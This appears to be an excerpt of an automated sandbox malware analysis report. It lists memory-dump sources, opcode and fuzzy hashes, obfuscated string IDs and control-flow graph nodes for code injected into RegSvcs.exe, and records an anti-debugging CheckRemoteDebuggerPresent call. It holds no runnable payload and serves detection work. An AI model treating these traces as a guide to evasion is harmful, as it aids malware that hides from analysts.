                                                                                                                            • Instruction Fuzzy Hash: CBF0A77194520CAFCB11DFF4C9009CEBFF9EF4A300F9042DA99099B624EA724F009792
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.2217534677.0000000001710000.00000040.00000800.00020000.00000000.sdmp, Offset: 01710000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_1710000_RegSvcs.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: e33c3844b8f6eed0ab87bf47c2291e9fad460aa764aa7b3d4a13c13052748f42
                                                                                                                            • Instruction ID: 3a3dfcc1745699ffe835bee6f20b29a4c4b36dc09be7b70922ab18316addb3e5
                                                                                                                            • Opcode Fuzzy Hash: e33c3844b8f6eed0ab87bf47c2291e9fad460aa764aa7b3d4a13c13052748f42
                                                                                                                            • Instruction Fuzzy Hash: 2EE04F2134E5444FC7058B2CCCA5629FB73AF96205B1C84A65A48CB2AFC525CC0BC352
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.2217534677.0000000001710000.00000040.00000800.00020000.00000000.sdmp, Offset: 01710000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_1710000_RegSvcs.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 0af150a82faf80f990901930fad28cb2c0d955c757afad049384a78c60361165
                                                                                                                            • Instruction ID: e3494dc1702e2aa40fc6ad46062022e2271afadc966a44f11f331e5ad9abf3c4
                                                                                                                            • Opcode Fuzzy Hash: 0af150a82faf80f990901930fad28cb2c0d955c757afad049384a78c60361165
                                                                                                                            • Instruction Fuzzy Hash: 78D02E30048388AFE3102178CC2A294BB74A702710F008071EA0286295EA91398A9BD2
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.2217534677.0000000001710000.00000040.00000800.00020000.00000000.sdmp, Offset: 01710000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_1710000_RegSvcs.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 9c07b1510fb233e37719e030fe27cb2b8e9063ffe63434a0ab20c5797589506f
                                                                                                                            • Instruction ID: 50a3cade73f17680bfe57cff511fd4d67094c377940fd7fd1b4bd67ded503bba
                                                                                                                            • Opcode Fuzzy Hash: 9c07b1510fb233e37719e030fe27cb2b8e9063ffe63434a0ab20c5797589506f
                                                                                                                            • Instruction Fuzzy Hash: BCE08C7194A208AFCB55DFB889404DABBF8AF4A31075142FBD508DB221E6750E049B62
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.2217534677.0000000001710000.00000040.00000800.00020000.00000000.sdmp, Offset: 01710000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_1710000_RegSvcs.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 85eca127cf59aace3664fbc754cf7aeeb230a47892c6dfbed94da4306986edac
                                                                                                                            • Instruction ID: 28880a01210185099c7dd947bbbdb57d01219276ed87dd697ff08eb39e00ac0a
                                                                                                                            • Opcode Fuzzy Hash: 85eca127cf59aace3664fbc754cf7aeeb230a47892c6dfbed94da4306986edac
                                                                                                                            • Instruction Fuzzy Hash: 8CE01A31940209CFCB15DFA8C9A45DEBFB6FB48701F449095E1036A259CB346D89CF51
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.2217534677.0000000001710000.00000040.00000800.00020000.00000000.sdmp, Offset: 01710000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_1710000_RegSvcs.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: a24f6972641e1dbdeb1ff7fd6a968950c9e8b6532aa5ea812eaa64d4166f2163
                                                                                                                            • Instruction ID: 1c095d51e7815953984d885130c0c708aeb0ebbb30a4b80c75350d929c836d24
                                                                                                                            • Opcode Fuzzy Hash: a24f6972641e1dbdeb1ff7fd6a968950c9e8b6532aa5ea812eaa64d4166f2163
                                                                                                                            • Instruction Fuzzy Hash: 07C04C6230280147D74CDA2CCD57B69F2A2DBDB644F7CD1B86509C7365DA32ED078645
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.2217534677.0000000001710000.00000040.00000800.00020000.00000000.sdmp, Offset: 01710000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_1710000_RegSvcs.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: a23243b7b130872a3fe1f047cd04bf181664bbea97967937e49f0a7b85477bbc
                                                                                                                            • Instruction ID: ea178501fd39d4ae513413c65a0221f03c195a616996c69635a717c1768d6242
                                                                                                                            • Opcode Fuzzy Hash: a23243b7b130872a3fe1f047cd04bf181664bbea97967937e49f0a7b85477bbc
                                                                                                                            • Instruction Fuzzy Hash: A3D0C97194510CAF8B00DFE8890089EBBEDEB49200BA046E69508DB614EA725F109B91
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.2217534677.0000000001710000.00000040.00000800.00020000.00000000.sdmp, Offset: 01710000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_1710000_RegSvcs.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 2ba8c987421090021381c1200d7c65ec7cd2b275f9f84dd3a9fd9b089caf330a
                                                                                                                            • Instruction ID: 5063730c0144b4f6d82d44b4ef0644aa4cc58d916debbf86b0459cb94071ecee
                                                                                                                            • Opcode Fuzzy Hash: 2ba8c987421090021381c1200d7c65ec7cd2b275f9f84dd3a9fd9b089caf330a
                                                                                                                            • Instruction Fuzzy Hash: 1FC08C31404388EBC7007579CC2C66ABB78A748300F408024EA0252259EF6079155ADB
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.2217534677.0000000001710000.00000040.00000800.00020000.00000000.sdmp, Offset: 01710000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_1710000_RegSvcs.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 23a1cdd71f938adb334530e6f8db41aa571fb37e0f443188602074fc9043e878
                                                                                                                            • Instruction ID: 9bbba77e91650d2ffa96421e33e1e20c2786c5345d2ed804ba4efde16ab9ecfc
                                                                                                                            • Opcode Fuzzy Hash: 23a1cdd71f938adb334530e6f8db41aa571fb37e0f443188602074fc9043e878
                                                                                                                            • Instruction Fuzzy Hash: 3EC08C338882404FCB0937B8EC18098BB24883422438680A2E50E8B51AD90089018F92
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.2217534677.0000000001710000.00000040.00000800.00020000.00000000.sdmp, Offset: 01710000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_1710000_RegSvcs.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
                                                                                                                            • Instruction ID: 424522431131923360a2424e5b60fcaca403654da384226d21dcd1d1d325544f
                                                                                                                            • Opcode Fuzzy Hash: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
                                                                                                                            • Instruction Fuzzy Hash: B3A001746050109B8689DA58D991818B7A2ABC9219728C4ADA819CB25ACF33E9039A44
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.2217534677.0000000001710000.00000040.00000800.00020000.00000000.sdmp, Offset: 01710000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_1710000_RegSvcs.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
                                                                                                                            • Instruction ID: 424522431131923360a2424e5b60fcaca403654da384226d21dcd1d1d325544f
                                                                                                                            • Opcode Fuzzy Hash: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
                                                                                                                            • Instruction Fuzzy Hash: B3A001746050109B8689DA58D991818B7A2ABC9219728C4ADA819CB25ACF33E9039A44
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.2217534677.0000000001710000.00000040.00000800.00020000.00000000.sdmp, Offset: 01710000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_1710000_RegSvcs.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: TJbq$TJbq$Te]q$xb`q
                                                                                                                            • API String ID: 0-3018173371
                                                                                                                            • Opcode ID: 72a39ea275038238df28ad780f607633064324dfc4d0f265a203aaa298a95d7f
                                                                                                                            • Instruction ID: 6e03560535cdd3caad05e63dfbe6b2d2fd4a2669706fef98c7abb0cbabfd09de
                                                                                                                            • Opcode Fuzzy Hash: 72a39ea275038238df28ad780f607633064324dfc4d0f265a203aaa298a95d7f
                                                                                                                            • Instruction Fuzzy Hash: 7AC15471A0061A9FDB18DF7DC984BA9BBF2BF88600F5481A8E509DB365DA30EC45CB51
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.2217534677.0000000001710000.00000040.00000800.00020000.00000000.sdmp, Offset: 01710000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_1710000_RegSvcs.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: 4']q$4']q
                                                                                                                            • API String ID: 0-3120983240
                                                                                                                            • Opcode ID: 6ab2de2a0a56e7be272addc55de5e90cc2a88e85453442a4a0fe35ca87ee5a4c
                                                                                                                            • Instruction ID: a7f03aa0f8307e3a7061be8b706e6304e81d53b7d5e44e3683b5df527463c662
                                                                                                                            • Opcode Fuzzy Hash: 6ab2de2a0a56e7be272addc55de5e90cc2a88e85453442a4a0fe35ca87ee5a4c
                                                                                                                            • Instruction Fuzzy Hash: A7612B70A01645CFE708DF7AED4169ABBE7FFC8300B44D529C4099B268DB7969098F91
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.2217534677.0000000001710000.00000040.00000800.00020000.00000000.sdmp, Offset: 01710000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_1710000_RegSvcs.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: 4']q$4']q
                                                                                                                            • API String ID: 0-3120983240
                                                                                                                            • Opcode ID: 53dfcf1caabab8ddc92fe9164f7a827dd9ff74f95e065d16e52c1934c50f385b
                                                                                                                            • Instruction ID: c91d7e0a36e2353dbca0e444a685cd4a9c837df4987805f9d50ad55b4d25a901
                                                                                                                            • Opcode Fuzzy Hash: 53dfcf1caabab8ddc92fe9164f7a827dd9ff74f95e065d16e52c1934c50f385b
                                                                                                                            • Instruction Fuzzy Hash: 5A511C70A01685CFE708DF7AED5069ABBE7FFC8300B54D529C4099B268DB786909CF91
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Execution Graph

                                                                                                                            Execution Coverage:10.4%
                                                                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                                                                            Signature Coverage:100%
                                                                                                                            Total number of Nodes:3
                                                                                                                            Total number of Limit Nodes:0
                                                                                                                            execution_graph 31339 4d3a6b0 31340 4d3a6f4 CheckRemoteDebuggerPresent 31339->31340 31341 4d3a736 31340->31341

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 954 a712b8-a712e7 956 a712ed-a71301 954->956 957 a7179a-a717b5 954->957 958 a71303 956->958 959 a71308-a7138b 956->959 962 a71bae-a71bba 957->962 958->959 985 a71397-a713eb 959->985 986 a7138d-a71391 959->986 963 a717c3-a717cf 962->963 964 a71bc0-a71bce 962->964 967 a717d5-a71852 963->967 968 a71b9e-a71ba3 963->968 987 a71854-a7185a 967->987 988 a7186a-a71883 967->988 973 a71bab 968->973 973->962 1012 a713f1-a713fa 985->1012 1013 a71759-a7177d 985->1013 986->985 989 a7185e-a71860 987->989 990 a7185c 987->990 993 a71885-a718af 988->993 994 a718b4-a718f2 988->994 989->988 990->988 993->973 1006 a71917-a71924 994->1006 1007 a718f4-a71915 994->1007 1017 a7192b-a71931 1006->1017 1007->1017 1015 a71401-a71406 1012->1015 1016 a713fc-a71400 1012->1016 1024 a71784-a7178a 1013->1024 1019 a7140b-a7142b 1015->1019 1020 a71408 1015->1020 1016->1015 1021 a71933-a7194e 1017->1021 1022 a71950-a7199f 1017->1022 1030 a71430-a71439 1019->1030 1031 a7142d 1019->1031 1020->1019 1021->1022 1056 a719a5-a719aa 1022->1056 1057 a71aba-a71af9 1022->1057 1028 a71797-a71798 1024->1028 1029 a7178c 1024->1029 1028->957 1029->1028 1034 a71685-a71690 1030->1034 1035 a7143f-a7145d 1030->1035 1031->1030 1039 a71695-a716f0 call a70138 1034->1039 1040 a71692 1034->1040 1037 a7145f-a71461 1035->1037 1038 a71498-a714a1 1035->1038 1037->1038 1041 a71463-a71469 1037->1041 1043 a714a7-a714b7 1038->1043 1044 a7177f 1038->1044 1098 a716f2-a716f6 1039->1098 1099 a716fc-a71720 1039->1099 1040->1039 1045 a714f1-a71597 1041->1045 1046 a7146f 1041->1046 1043->1044 1048 a714bd-a714ce 1043->1048 1044->1024 1060 a715f1-a71605 1045->1060 1061 a71599-a7159b 1045->1061 1049 a71472-a71474 1046->1049 1048->1044 1052 a714d4-a714e4 1048->1052 1054 a71476 1049->1054 1055 a71479-a71484 1049->1055 1052->1044 1053 a714ea-a714ef 1052->1053 1053->1045 1054->1055 1055->1044 1062 a7148a-a71494 1055->1062 1068 a719b4-a719b7 1056->1068 1082 a71b12-a71b1e 1057->1082 1083 a71afb-a71b10 1057->1083 1060->1044 1066 a7160b-a71625 1060->1066 1061->1060 1064 a7159d-a715a9 1061->1064 1062->1049 1067 a71496 1062->1067 1069 a71676-a7167f 1064->1069 1070 a715af 1064->1070 1066->1044 1071 a7162b-a71648 1066->1071 1067->1045 1072 a71a82-a71aaa 1068->1072 1073 a719bd 1068->1073 1069->1034 1069->1035 1079 a715b5-a715b7 1070->1079 1071->1044 1081 a7164e-a7166c 1071->1081 1087 a71ab0-a71ab4 1072->1087 1074 a71a26-a71a52 1073->1074 1075 a719f5-a71a21 1073->1075 1076 a719c4-a719f0 1073->1076 1077 a71a54-a71a80 1073->1077 1074->1087 1075->1087 1076->1087 1077->1087 1084 a715c1-a715dd 1079->1084 1085 a715b9-a715bd 1079->1085 1081->1044 1086 a71672 1081->1086 1090 a71b27-a71b86 1082->1090 1083->1090 1084->1044 1092 a715e3-a715ea 1084->1092 1085->1084 1086->1069 1087->1057 1087->1068 1102 a71b8e-a71b9c 1090->1102 1092->1079 1095 a715ec 1092->1095 1095->1069 1098->1099 1105 a71722-a7174c 1099->1105 1106 a7174e-a71753 1099->1106 1102->973 1105->1106 1106->1013
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.3243730276.0000000000A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_a70000_RegSvcs.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: 4']q$TJbq$TJbq$Te]q$paq$xb`q
                                                                                                                            • API String ID: 0-2757515195
                                                                                                                            • Opcode ID: f4091b5dadd9f4fac9eb2fbab860cf34f9a3657409d978a59d05743e0dc171b1
                                                                                                                            • Instruction ID: 06aa64a2f2981243a36293a9349eb90787fc4e53967b288490d151003d76c2c0
                                                                                                                            • Opcode Fuzzy Hash: f4091b5dadd9f4fac9eb2fbab860cf34f9a3657409d978a59d05743e0dc171b1
                                                                                                                            • Instruction Fuzzy Hash: A8521275A001149FDB19DF68C984EA9BBF2FF88314F15C1A8E50A9B276DB31EC81DB50
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 1858 6771940-6771a44 1864 6771955-677195a 1858->1864 1865 6771a15-6771a1a 1858->1865 1866 677195c 1864->1866 1867 67719cb-67719d2 1864->1867 1865->1864 1866->1867 1868 67719b8-67719be 1867->1868 1869 67719c7 1868->1869 1870 67719c0 1868->1870 1871 677195e-6771968 1869->1871 1872 67719c9 1869->1872 1870->1871 1870->1872 1873 6771a46-6771a7f 1870->1873 1874 67719d4-67719f7 1870->1874 1875 677198d-6771992 1870->1875 1947 677196d call 67715f5 1871->1947 1948 677196d call 6771ab0 1871->1948 1949 677196d call 6771940 1871->1949 1950 677196d call 6770e4f 1871->1950 1951 677196d call 677192f 1871->1951 1952 677196d call 677011e 1871->1952 1953 677196d call 6771aee 1871->1953 1954 677196d call 6770149 1871->1954 1955 677196d call 67717e9 1871->1955 1872->1868 1886 6771a81-6771a9a 1873->1886 1887 6771a2b-6771a3d 1873->1887 1874->1875 1876 6771973-677197e 1876->1873 1894 6771aa2-6771ad0 1886->1894 1895 6771a9c-6771aa0 1886->1895 1887->1872 1896 6771bf7-6771bfd 1894->1896 1897 6771ad5-6771ad8 1894->1897 1895->1894 1898 6771b06-6771b0e 1896->1898 1899 6771c02 1896->1899 1900 6771ae1-6771ae9 1897->1900 1901 6771ada 1897->1901 1903 6771b13 1898->1903 1915 6771c4c-6771c5f 1898->1915 1902 6771c07-6771c0a 1899->1902 1904 6771c13-6771c15 1900->1904 1901->1900 1901->1902 1901->1903 1901->1904 1905 6771bf0-6771bf5 1901->1905 1906 6771b7e-6771b83 1901->1906 1907 6771c1b-6771c25 1901->1907 1908 6771b99-6771ba3 1901->1908 1909 6771c45-6771c4a 1901->1909 1910 6771b20-6771b27 1901->1910 1911 6771c2d-6771c3c 1901->1911 1912 6771b4c-6771b50 1901->1912 1913 6771c8b-6771c92 1901->1913 1914 6771b49-6771c19 1901->1914 1902->1907 1916 6771c0c 1902->1916 1931 6771b1b-6771b1e 1903->1931 1923 6771cae-6771cb6 1904->1923 1940 6771bc5-6771be0 1904->1940 1905->1902 1906->1902 1907->1911 1908->1923 1928 6771ba9-6771bb3 1908->1928 1909->1905 1920 6771b2e-6771b30 1910->1920 1921 6771b29-6771b2d 1910->1921 1918 6771c3e 1911->1918 1919 6771c6c-6771c76 1911->1919 1926 6771b52-6771b5b 1912->1926 1927 6771b71 1912->1927 1922 6771c94-6771c9f 1913->1922 1913->1923 1914->1899 1915->1897 1924 6771c65-6771c67 1915->1924 1916->1903 1916->1904 1916->1905 1916->1906 1916->1907 1916->1908 1916->1909 1916->1910 1916->1911 1916->1912 1916->1914 1918->1900 1918->1902 1918->1903 1918->1904 1918->1905 1918->1906 1918->1907 1918->1909 1918->1910 1918->1911 1918->1912 1918->1913 1918->1914 1919->1923 1937 6771c78-6771c7f 1919->1937 1934 6771b32-6771b40 1920->1934 1935 6771b88-6771b8d 1920->1935 1921->1920 1922->1923 1933 6771ca1-6771ca5 1922->1933 1924->1897 1936 6771c84-6771c86 1924->1936 1938 6771b62-6771b65 1926->1938 1939 6771b5d-6771b60 1926->1939 1932 6771b74-6771b7b 1927->1932 1928->1936 1942 6771b92-6771b97 1931->1942 1943 6771ca7-6771ca9 1933->1943 1934->1897 1944 6771b42-6771b47 1934->1944 1935->1942 1935->1943 1936->1902 1937->1936 1941 6771b6f 1938->1941 1939->1941 1940->1897 1946 6771be6-6771beb 1940->1946 1941->1932 1942->1902 1943->1902 1944->1897 1946->1897 1947->1876 1948->1876 1949->1876 1950->1876 1951->1876 1952->1876 1953->1876 1954->1876 1955->1876
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.3310174991.0000000006770000.00000040.00000800.00020000.00000000.sdmp, Offset: 06770000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_6770000_RegSvcs.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: $]q$$]q
                                                                                                                            • API String ID: 0-127220927
                                                                                                                            • Opcode ID: 44db9f74b58229b034df9243463f31f0292039cc1974ce0ac0a897646082928a
                                                                                                                            • Instruction ID: 7607b040398f793060f9a351080cf756689cf99c699447750716e1b3d0e7880e
                                                                                                                            • Opcode Fuzzy Hash: 44db9f74b58229b034df9243463f31f0292039cc1974ce0ac0a897646082928a
                                                                                                                            • Instruction Fuzzy Hash: 3E910330E08249CFEF54CFA8C450BBEBBB2EB85311F89C176D052AB295E7349945CB91
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • CheckRemoteDebuggerPresent.KERNELBASE(?,?), ref: 04D3A727
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.3298316044.0000000004D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D30000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_4d30000_RegSvcs.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CheckDebuggerPresentRemote
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3662101638-0
                                                                                                                            • Opcode ID: 8dff49e8c11c4632ba244c9eb14cbf7f868a936c87087cb3932c5171f8328c7c
                                                                                                                            • Instruction ID: 45b1996f0016393abf396982842271b4cb4a788d938347f14c1fa2f6a8cc9445
                                                                                                                            • Opcode Fuzzy Hash: 8dff49e8c11c4632ba244c9eb14cbf7f868a936c87087cb3932c5171f8328c7c
                                                                                                                            • Instruction Fuzzy Hash: 392125B19002598FCB10CF9AD484BEEBBF4AF49310F14845AE459A7350D778A944CFA1
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.3310174991.0000000006770000.00000040.00000800.00020000.00000000.sdmp, Offset: 06770000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_6770000_RegSvcs.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: $]q
                                                                                                                            • API String ID: 0-1007455737
                                                                                                                            • Opcode ID: 7ddfad74a7146714771dd5b0e3bf98aee616afb82416c74f1f3aea8e848b64fe
                                                                                                                            • Instruction ID: dd656a329da77869a738983144ad94443d6301cb0dc569dccab20e3250a4dcd2
                                                                                                                            • Opcode Fuzzy Hash: 7ddfad74a7146714771dd5b0e3bf98aee616afb82416c74f1f3aea8e848b64fe
                                                                                                                            • Instruction Fuzzy Hash: 67418131E04115CFEF54CFA9C440BBAB7B2EB89316F99C276D0529B295E3349984CB91
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.3243730276.0000000000A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_a70000_RegSvcs.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 0b50120e1461b04452f01d5c0303b25f7f8585495e11048a5c35b39f2de61964
                                                                                                                            • Instruction ID: cfa4ab7097502651554c1720dce3d8690326c958a4928ade8cc87f59f40de091
                                                                                                                            • Opcode Fuzzy Hash: 0b50120e1461b04452f01d5c0303b25f7f8585495e11048a5c35b39f2de61964
                                                                                                                            • Instruction Fuzzy Hash: 86B1D273A0A140DFDF249724CC1477A7BB2AB41311F2BC4B6D45A8F292D674DE82B752
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.3243730276.0000000000A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_a70000_RegSvcs.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: d1e66ca8f1ec1639c543cadf58b8a2d6c5b1b76935a218cf652c04be632e8839
                                                                                                                            • Instruction ID: 41bcdfe92c1f007a2f829b28970ab10fceef498a1d826ff5d4181d1eb5976e0f
                                                                                                                            • Opcode Fuzzy Hash: d1e66ca8f1ec1639c543cadf58b8a2d6c5b1b76935a218cf652c04be632e8839
                                                                                                                            • Instruction Fuzzy Hash: F1B13C70E00209CFDF15DFA9CD857AEBBF2AF88314F14C129D819AB254EB759845CB91
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.3243730276.0000000000A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_a70000_RegSvcs.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 019767823d806a626fc7214dfaf708ce35ba52e7097922f84ce7cffd37e73ad2
                                                                                                                            • Instruction ID: 7aee7c12b60e9b145d2277ef33987c88d1ea86eca782f6df98c92d7b8eae7060
                                                                                                                            • Opcode Fuzzy Hash: 019767823d806a626fc7214dfaf708ce35ba52e7097922f84ce7cffd37e73ad2
                                                                                                                            • Instruction Fuzzy Hash: 05B15B70E002098FDF14CFA9CD8579EBBF2AF88714F24C569E419E7294EB749845CB81
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.3243730276.0000000000A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_a70000_RegSvcs.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 3d1a8e7813569a2863966ae0514c47171356fcfe61d85f434b040270356413f1
                                                                                                                            • Instruction ID: 9d70f14e9fe1f3494453613bca7e9f048c7dcef260f1b36ebecb4fd8ae915e9f
                                                                                                                            • Opcode Fuzzy Hash: 3d1a8e7813569a2863966ae0514c47171356fcfe61d85f434b040270356413f1
                                                                                                                            • Instruction Fuzzy Hash: 67916CB1E00209DFDF14DFA9C9817AEBBF2BF88354F14C129E419A7294EB749945CB81
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
